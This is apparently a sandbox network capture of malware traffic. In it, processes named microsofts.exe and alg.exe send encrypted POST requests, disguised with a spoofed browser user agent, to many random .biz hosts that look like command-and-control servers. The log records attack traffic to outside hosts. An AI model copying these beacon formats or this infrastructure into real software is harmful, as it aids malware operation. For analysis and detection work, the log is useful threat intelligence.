Nov 5, 2024 17:02:53.067274094 CET | 778 | OUT | Data Raw: 4f 6c cf 64 95 a2 50 b5 fe 02 00 00 39 a0 d1 34 fa 56 90 e0 87 69 0f fe 9b 7a 68 b7 f6 9a 60 65 31 83 e7 3b b8 7d 54 23 b7 1f 76 24 0a 97 47 92 ca 64 0c 2c f7 bd a4 15 85 8e b9 5d 6e 6f c6 8f 64 2a 7c 30 c4 12 9c 73 79 d1 d3 3d 3e cd 74 81 9f f4
Data Ascii: OldP94Vizh`e1;}T#v$Gd,]nod*|0sy=>tCy=*fGG]2]xMd~@}91u9)$T'0Ba##ZnBQ =U^m{(1|k"qK@(Mp`H]+fOaH1w!P
Nov 5, 2024 17:02:54.491164923 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:02:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=46f14f7fa2241b8ed2f81773e7169f64|173.254.250.76|1730822574|1730822574|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 4
Source IP: 192.168.2.5
Source Port: 49710
Destination IP: 54.244.188.177
Destination Port: 80
PID: 1816
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:02:53.772322893 CET | 347 | OUT | POST /ltaudf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cvgrf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:02:53.772322893 CET | 828 | OUT | Data Raw: de 00 7a 98 0c f6 57 0c 30 03 00 00 e5 0a ca 6d 54 d0 ed cb cc 23 0f 42 64 20 f9 83 1e 02 b2 e9 f4 c7 ac e8 78 4d 80 63 d3 c0 45 b2 18 cd 6b 04 ad 4f 77 6d f8 6d 4c e9 f3 9f 72 ba 4a 9f 00 4a 5b 7b 51 99 51 df 47 50 06 c3 50 c6 68 1e 3d d4 0b 78
Data Ascii: zW0mT#Bd xMcEkOwmmLrJJ[{QQGPPh=x}dC7qK`oPitTE<LC xa%V<d#\%D$Vi$;N[_=w38d*QLpaRBw*^`1B=vE-i5Mg_/l
Nov 5, 2024 17:02:54.593645096 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:02:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=269696fd45ca58ff068548932f2b78e4|173.254.250.76|1730822574|1730822574|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID: 5
Source IP: 192.168.2.5
Source Port: 59388
Destination IP: 44.221.84.105
Destination Port: 80
PID: 1816
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:02:54.776277065 CET | 352 bytes | OUT | POST /hadsfcqa HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: npukfztj.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Nov 5, 2024 17:02:54.776551962 CET | 828 bytes | OUT | Data Raw: 7b 45 27 b0 b3 42 80 f7 30 03 00 00 36 9e 17 af 8a 6f f4 b7 15 af 6b ec 31 1e 5d 9d 93 c5 3d c8 cc 69 af fd 42 b7 9a 3c a7 6a 97 de d7 7b b0 6d 74 f7 59 1d a0 39 f4 2d 7f 4d 32 d1 cb cf f8 14 a6 09 c6 f7 72 76 26 d9 af 42 82 f1 18 1c d6 b9 62 b1
    Data Ascii: {E'B06ok1]=iB<j{mtY9-M2rv&BbD[&)%%YM*wZ8;fhuFg@o9y<\QT| Ec5MY;XU-=1k|Wk02c"m4:M,r


Session ID: 6
Source IP: 192.168.2.5
Source Port: 59389
Destination IP: 44.221.84.105
Destination Port: 80
PID: 1816
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:02:55.219504118 CET | 347 bytes | OUT | POST /jsr HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: npukfztj.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Nov 5, 2024 17:02:55.219504118 CET | 828 bytes | OUT | Data Raw: d2 66 32 a2 8b 14 da dc 30 03 00 00 a7 1f 3d 64 16 ba 3b ac af 38 52 70 a7 e9 a5 67 35 91 e2 85 2f 0d a8 75 10 e0 4c ac f5 85 c5 8a 57 24 f1 c1 65 7e 7a 92 86 3d 9a 8f ba 81 c9 e6 18 d5 f5 78 12 22 37 7c e9 f8 23 64 51 35 19 17 42 87 b6 58 05 c5
    Data Ascii: f20=d;8Rpg5/uLW$e~z=x"7|#dQ5BXI4c:#J%MJT]9;f69}rDUx.P6aVwx;_UX!xQh!L;*_(l2 e]4[7s$
Nov 5, 2024 17:02:55.878238916 CET | 416 bytes | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:02:55 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=54a8c63b51117ccb5cb6b6994bb8bb96|173.254.250.76|1730822575|1730822575|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 7
Source IP: 192.168.2.5
Source Port: 59390
Destination IP: 54.244.188.177
Destination Port: 80
PID: 1492
Process: C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:02:55.373518944 CET | 348 bytes | OUT | POST /pkljfdj HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: cvgrf.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 5, 2024 17:02:55.373532057 CET | 778 bytes | OUT | Data Raw: 60 c9 8e f0 aa 08 bc e6 fe 02 00 00 eb f5 d2 dd ff ea cb 21 cb 06 1d 12 9e 69 ef c9 e4 ee 3c 51 b7 d2 9d 83 af 5d d3 c2 ed 41 73 a2 10 08 0a af 60 92 d4 7a 7f e4 49 55 53 8b a5 4a 4a cf 19 d5 b0 31 53 a6 fa 79 2d 86 0c b7 e5 44 b9 ac a0 da 67 2b
    Data Ascii: `!i<Q]As`zIUSJJ1Sy-Dg+FxX8vug"cIp*d^lvK Z$-YTERIrnk:ljsdgg2tHDDgL+*`mhz7CNf{a!X
Nov 5, 2024 17:02:56.217242002 CET | 413 bytes | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:02:56 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=f88190172fabc44936b7b1b143c38d95|173.254.250.76|1730822576|1730822576|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 59391 | 172.234.222.143 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:02:56.091259003 CET | 356 | OUT | POST /qljrltdbsuxud HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:02:56.091412067 CET | 828 | OUT | Data Raw: 5d 60 c0 93 b1 44 b2 29 30 03 00 00 63 81 e1 bf 4e 5d 4e 8d 7e 4a 10 b5 98 ae 30 1c bb 83 be d4 32 eb fd 0e 35 6b d5 ad f8 94 83 42 7e 16 3c ba 22 15 01 ca a7 96 02 af 81 cf 8a 03 57 c2 c8 d7 dd 4b aa 27 94 dc ab 17 b9 12 15 25 10 b5 e8 eb 8f 74
Data Ascii: ]`D)0cN]N~J025kB~<"WK'%tjn4\4J#$e2E!E*PgeYM[!5"UsyW@orj5?4gSTVOxVbRxHAW!Fs,1RrE


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 59392 | 44.221.84.105 | 80 | 1492 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:02:56.378994942 CET | 348 | OUT | POST /ioqv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: npukfztj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:02:56.379080057 CET | 778 | OUT | Data Raw: 22 c0 79 42 f9 d2 bf 3b fe 02 00 00 36 35 b8 0c 1e 7f ac ff 3e b7 34 55 ee fb 59 56 18 29 2f 2e 95 78 42 98 f3 8a e8 51 71 76 45 ff 5a 6c a5 b2 97 0e 7a c9 98 87 0f dc 02 7d 0e b6 b4 1d 34 6f 7a 6c 8b 4a 17 1d cf 2a bb e8 d3 6b 87 13 3b 4f 06 4a
Data Ascii: "yB;65>4UYV)/.xBQqvEZlz}4ozlJ*k;OJ_(h~([Y(`d2eqAY$D->xMkN4EO|yH&N7,?{?@>R@"ERBD)L/SNB'&G-
Nov 5, 2024 17:02:57.029869080 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:02:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8bbe1a25b7d021b62dfe708f0ffdf72e|173.254.250.76|1730822576|1730822576|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 59393 | 172.234.222.143 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:02:56.791968107 CET | 353 | OUT | POST /plvfcdbflq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:02:56.791968107 CET | 828 | OUT | Data Raw: d9 b7 e0 4c c1 e0 fc 73 30 03 00 00 2b cd a9 82 bf 1e 48 6f 04 a1 45 83 85 87 72 e6 2a 56 81 7c 4a 6a 39 d0 ae 34 30 3c 67 99 77 06 32 cf 31 04 05 89 6c e3 43 a3 35 be 76 86 55 92 1d fe 56 d9 b2 ac 6f ad 8b 95 fe ab 1f 6e f3 ab c6 d3 6d ff 0e 97
Data Ascii: Ls0+HoEr*V|Jj940<gw21lC5vUVonmXbFjV<lr&D]+28r*U&GTc47[rJW>%/pQ-4YsCF`0s3jTuM;Zt&5q;LQC#WC


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 59394 | 172.234.222.138 | 80 | 1492 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:02:57.134841919 CET | 354 | OUT | POST /blqwxioreon HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:02:57.134864092 CET | 778 | OUT | Data Raw: 33 66 ca 13 8c 10 ea a1 fe 02 00 00 57 bb 49 ed 21 4a be 15 47 b9 99 c9 1e 29 72 b9 29 a0 0a 19 8c cc d2 4d 2e f8 5e 6d cd dd 88 ad 52 cd 02 e3 6a e7 b1 42 45 a2 63 8c 57 c4 ac 94 28 14 d6 29 fb f1 c2 29 e6 b5 01 97 aa 35 d3 c8 c9 80 08 48 d4 d3
Data Ascii: 3fWI!JG)r)M.^mRjBEcW())5HO}}vZ*l^f+"Q`.>kI:|dq0]lJ%`6BQIJ%d49j=gfJS$?lJZ@BCGo4uCAk(AZqh,)lmX;G@6


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 59395 | 18.141.10.107 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:02:57.476269007 CET | 358 | OUT | POST /vydffyeediqodv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: knjghuig.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:02:57.476289034 CET | 828 | OUT | Data Raw: f1 47 24 20 e0 39 58 ab 30 03 00 00 a0 16 8f 5d 50 c4 2e 38 a4 66 59 71 96 cd 7a 38 8a 8e a7 57 c3 83 be ff 72 1a b1 28 59 fc b5 e7 92 e8 3d 10 95 25 d9 1d c6 30 e1 4e 8a e2 07 4d af a2 67 0b 1b f7 2d ee fd da ca ab 89 60 2e d3 bb 62 96 ce e2 99
Data Ascii: G$ 9X0]P.8fYqz8Wr(Y=%0NMg-`.bX{XPfPF,{%{_#-/,yim|D7RwKQANJTo=} .KtXjF@X>'FzMX#{mzW7r8UYk#Q
Nov 5, 2024 17:02:58.923948050 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:02:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a22c7690e87e3869706fd2ea3a30fea6|173.254.250.76|1730822578|1730822578|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 59396 | 172.234.222.138 | 80 | 1492 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:02:57.926479101 CET | 351 | OUT | POST /eybmhvtk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:02:57.926534891 CET | 778 | OUT | Data Raw: a7 ba 92 05 25 0a 7e e4 fe 02 00 00 5d 37 91 23 e2 0c 09 75 e0 38 68 8b 19 48 ae bf 59 35 92 bc 48 66 25 17 7f 1a 82 40 c3 f8 04 d9 9e b3 76 45 34 f3 c0 a5 7e 5d 45 f0 d8 cc 6f bf 99 9e 04 5d cc 0f f4 01 30 d4 39 5d 4d d5 32 2c 06 b8 a9 1b 72 5d
Data Ascii: %~]7#u8hHY5Hf%@vE4~]Eo]09]M2,r]]16jYNT|\qGt+fQ~!k)?+kyS\0&+k`[y~O@LDKWZc1n[fZ$@^+6SQ8mcMK9fhx}=`"M@'o


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 59398 | 18.141.10.107 | 80 | 1492 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:02:58.845659018 CET | 350 | OUT | POST /ovtsne HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: knjghuig.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:02:58.845685959 CET | 778 | OUT | Data Raw: 34 e9 fb 62 ca 69 fa 2d fe 02 00 00 0c 57 6d 66 64 d4 1d 3d 35 00 4d 99 57 ae e8 9a a3 e4 5f 1b 30 71 f3 53 6e 3d ae f5 94 28 70 73 c7 a6 85 e9 bc ce 2f 67 01 08 80 bf 51 8c f9 44 34 30 40 8c 3e ca ca ea 35 9e d1 ae c2 2b 9b 3b 09 61 d9 86 ed 30
Data Ascii: 4bi-Wmfd=5MW_0qSn=(ps/gQD40@>5+;a0nu>AEIzKdD/y1rE(#W^UqJ/:7M,A4><63s?^TsPctRMDWg+9?i[|/Fy-_aluY{tPV
Nov 5, 2024 17:03:00.281542063 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:03:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7f1290ff57d342a11e201adeb4d84dcc|173.254.250.76|1730822580|1730822580|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 59399 | 82.112.184.197 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:02:58.968955994 CET | 345 | OUT | POST /ebm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:02:58.968977928 CET | 828 | OUT | Data Raw: 42 6b c4 32 aa 66 76 68 30 03 00 00 66 e2 ca 66 e2 e0 50 11 88 f5 46 0a 9e cd 9c 2e 57 56 4e 4b 54 43 c5 21 f7 d6 2f b2 5e 23 a7 ef 4c 7f ce 1b 60 68 ad 31 ce 46 cb 73 9b 76 7c d9 b4 ab 5c 59 09 b2 41 81 51 0e ba f0 53 77 a9 e6 ad 37 3a 15 9d 2b
Data Ascii: Bk2fvh0ffPF.WVNKTC!/^#L`h1Fsv|\YAQSw7:+j*fbBto;tx)K$Yh^I#!D/f;Oa*vZH<O M~Iq_JaXU4`_ &o1aoz:&9$(3t6N


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 59402 | 82.112.184.197 | 80 | 1492 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:00.391305923 CET | 350 | OUT | POST /oiarwfji HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:03:00.391361952 CET | 778 | OUT | Data Raw: 3b 99 f9 1b e1 3e 8d 19 fe 02 00 00 3a 89 3c 7e 8a 7b 17 de 7e 2e 89 10 e7 26 a9 bf 5d 8a 59 24 03 db 49 fc c4 b7 9f 78 3a 48 ff 38 78 e5 ac 95 4b 0f d8 80 35 94 ce 26 c0 e8 aa ad fa 00 5d 84 cd fb 94 93 ff a6 76 5e 17 69 8e 08 00 36 26 3d 86 4f
Data Ascii: ;>:<~{~.&]Y$Ix:H8xK5&]v^i6&=OhWb33Dul.}g3c(gAY+Bw>G'1*z4@j6!GUV0cwREUK]:x}QGpV3-1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 59416 | 82.112.184.197 | 80 | 1492 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:04.154068947 CET | 357 | OUT | POST /tookpqdumsvuivi HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: lpuegx.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 5, 2024 17:03:04.154093981 CET | 778 | OUT | Data Raw: 8e 27 44 e2 15 83 98 ee fe 02 00 00 62 4f c3 6c 62 35 e5 5b 98 96 1c 93 53 cd 21 1f 04 67 d3 a9 b2 9a c5 f9 35 48 a7 b6 ea df 0e 60 40 1f 01 19 8f 42 18 9e 49 c9 8c 74 57 c8 93 f3 95 9a e0 17 be 25 e7 a9 0e e9 3a 4e 3f d5 de b6 e4 84 6d 07 35 94
    Data Ascii: 'DbOlb5[S!g5H`@BItW%:N?m5/_l'gEMq+%|Xn,g97|f"8%vuCxy1oM4`&Rb~nnXg{qI,?&&P|"Dg[86fZy^


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 59437 | 82.112.184.197 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:07.123045921 CET | 358 | OUT | POST /tqkivcurvenplovb HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: lpuegx.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Nov 5, 2024 17:03:07.123068094 CET | 828 | OUT | Data Raw: ef 56 d7 64 fe 1b f5 05 30 03 00 00 ec bb 16 63 46 24 24 84 68 22 19 2b 57 1f b3 56 7f 9a 96 c1 84 b4 c0 d2 e1 e1 fd d4 d7 14 c6 0c ca 76 8d 71 17 c8 de ca 49 09 e7 22 71 71 0e 18 34 30 94 45 8a 6e 72 d3 46 f7 4a a5 06 02 60 b5 18 3b 06 8b a5 0d
    Data Ascii: Vd0cF$$h"+WVvqI"qq40EnrFJ`;'e\Np5\5O5j3wh.Nq;b)+]}eeJp^R /d LBGivGJ`JYAFY5\.KP2"*


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 59443 | 82.112.184.197 | 80 | 1492 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:08.155162096 CET | 347 | OUT | POST /dh HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: vjaxhpbji.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 5, 2024 17:03:08.156380892 CET | 778 | OUT | Data Raw: ab a1 cc 13 15 f9 3e 91 fe 02 00 00 dd 11 ba 59 a1 aa b4 8c 6e 48 b6 df 5d 7f 8b b3 34 4a 39 df 9b 1d 71 47 6a 81 98 98 a9 c9 72 94 87 c1 26 87 7e 93 5b 1d 0f d2 57 55 6c 7d 61 d3 35 00 cb 83 88 a1 dc a4 c1 e6 46 89 10 22 95 9f 93 ab 25 b8 ee 65
    Data Ascii: >YnH]4J9qGjr&~[WUl}a5F"%e1GvwXK`Ls 1w31037%;HK]KPDc6n3Fvz4%L03:Lp0:=BBI KOY&925AV4f


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 59465 | 82.112.184.197 | 80 | 1492 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:12.106858015 CET | 350 | OUT | POST /dltqf HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: vjaxhpbji.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 5, 2024 17:03:12.106929064 CET | 778 | OUT | Data Raw: 94 55 d2 4f 6d 04 5c 28 fe 02 00 00 1f b3 d0 ca dc cf 58 fb 36 f4 02 90 49 c7 c8 d8 1c ea ff e8 20 32 11 b3 f9 f3 51 d6 dc 79 ee ab 72 4b 53 8d 2a 44 90 dc d1 05 8c 68 a7 23 43 d9 a8 fc 9b 8f 06 82 dd 79 f6 98 06 ee 75 db 1b 9a 80 67 b9 d3 be a7
    Data Ascii: UOm\(X6I 2QyrKS*Dh#Cyug(K+XE&8#+vConZf/)G-,41~B6HNjIs1eo^}"I8^Fch*p6:zB{gng


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 59487 | 82.112.184.197 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:15.653625965 CET | 352 | OUT | POST /augbqjw HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: vjaxhpbji.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
